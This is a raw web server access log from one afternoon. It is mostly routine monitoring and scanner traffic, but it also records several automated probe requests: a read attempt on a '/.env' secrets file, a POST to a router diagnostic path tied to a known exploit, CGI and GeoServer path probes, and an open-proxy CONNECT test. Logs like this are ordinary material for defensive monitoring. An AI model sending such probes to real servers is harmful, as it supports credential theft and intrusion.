212.91.246.72 - - [03/Oct/2024:15:22:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:15:23:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:15:23:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:23:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:24:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:24:57 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
212.91.246.72 - - [03/Oct/2024:15:25:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.3 - - [03/Oct/2024:15:26:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
185.224.128.47 - - [03/Oct/2024:15:26:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:15:26:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:27:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:28:12 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
65.49.1.16 - - [03/Oct/2024:15:28:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:15:28:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:28:55 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
92.249.48.232 - - [03/Oct/2024:15:29:32 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
212.91.246.72 - - [03/Oct/2024:15:29:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.3 - - [03/Oct/2024:15:30:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [03/Oct/2024:15:30:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.3 - - [03/Oct/2024:15:30:54 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.156.41 - - [03/Oct/2024:15:31:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
65.49.1.18 - - [03/Oct/2024:15:31:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 SE 2.X MetaSr 1.0"
184.105.139.68 - - [03/Oct/2024:15:31:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
212.91.246.72 - - [03/Oct/2024:15:31:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:15:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [03/Oct/2024:15:32:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.1.14 - - [03/Oct/2024:15:32:22 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:15:32:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:33:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.156.45 - - [03/Oct/2024:15:33:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
184.105.139.68 - - [03/Oct/2024:15:34:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
92.249.48.232 - - [03/Oct/2024:15:34:24 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
64.62.156.42 - - [03/Oct/2024:15:34:36 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [03/Oct/2024:15:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.68 - - [03/Oct/2024:15:34:59 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
212.91.246.72 - - [03/Oct/2024:15:35:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:36:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:37:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:38:00 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
212.91.246.72 - - [03/Oct/2024:15:38:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:39:16 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
212.91.246.72 - - [03/Oct/2024:15:39:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:15:40:46 +0200] "GET / HTTP/1.1" 400 329 "-" "curl/7.68.0"
212.91.246.72 - - [03/Oct/2024:15:40:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:41:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:15:42:33 +0200] "GET /command_port.ini HTTP/1.1" 404 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:42:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:43:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:15:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:15:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:15:47:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:15:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:15:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:15:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:15:49:24 +0200] "GET /command_port.ini HTTP/1.1" 404 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:15:50:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:50:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:51:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:15:53:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:15:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:15:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:54:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:55:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:56:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:15:57:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:15:57:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.81.144.41 - - [03/Oct/2024:15:58:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
212.91.246.72 - - [03/Oct/2024:15:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:15:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:00:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:00:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:00:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:01:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:02:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:03:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:04:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:05:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:05:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:06:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:07:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.168.39 - - [03/Oct/2024:16:08:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
104.248.168.39 - - [03/Oct/2024:16:08:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.87/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:16:08:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:09:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:16:10:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:10:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:16:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:16:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:16:13:49 +0200] "\xd9\xaa\xec\xf9\xc5W.\xcb`\x10\x04\xb0hP" 501 329 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:16:14:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:16:14:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:15:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:16:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:16:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:16:20:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:16:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:16:22:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:24:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:25:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:26:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.22.72 - - [03/Oct/2024:16:26:18 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:26:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:27:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:16:29:15 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:29:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:16:30:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:30:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:31:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:32:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:16:33:06 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
185.191.126.213 - - [03/Oct/2024:16:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:16:33:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:16:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:16:34:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.213.187.244 - - [03/Oct/2024:16:35:12 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2024:16:35:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.22.72 - - [03/Oct/2024:16:36:25 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
185.191.126.213 - - [03/Oct/2024:16:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:36:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:37:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:16:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:38:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:39:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:40:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:41:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.156.240.139 - - [03/Oct/2024:16:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.156.240.139 - - [03/Oct/2024:16:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.79 - - [03/Oct/2024:16:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
4.156.240.139 - - [03/Oct/2024:16:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:16:42:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:16:43:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:16:43:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
4.156.240.139 - - [03/Oct/2024:16:43:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
121.212.65.44 - - [03/Oct/2024:16:43:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [03/Oct/2024:16:43:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.156.240.139 - - [03/Oct/2024:16:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.156.240.139 - - [03/Oct/2024:16:44:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.156.240.139 - - [03/Oct/2024:16:44:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.156.240.139 - - [03/Oct/2024:16:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
4.156.240.139 - - [03/Oct/2024:16:44:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:16:44:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.156.240.139 - - [03/Oct/2024:16:45:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:16:45:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [03/Oct/2024:16:46:46 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:16:46:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:47:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:49:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:16:50:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:16:50:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.167 - - [03/Oct/2024:16:50:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.118.39.167 - - [03/Oct/2024:16:50:15 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
175.107.1.98 - - [03/Oct/2024:16:50:44 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [03/Oct/2024:16:51:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
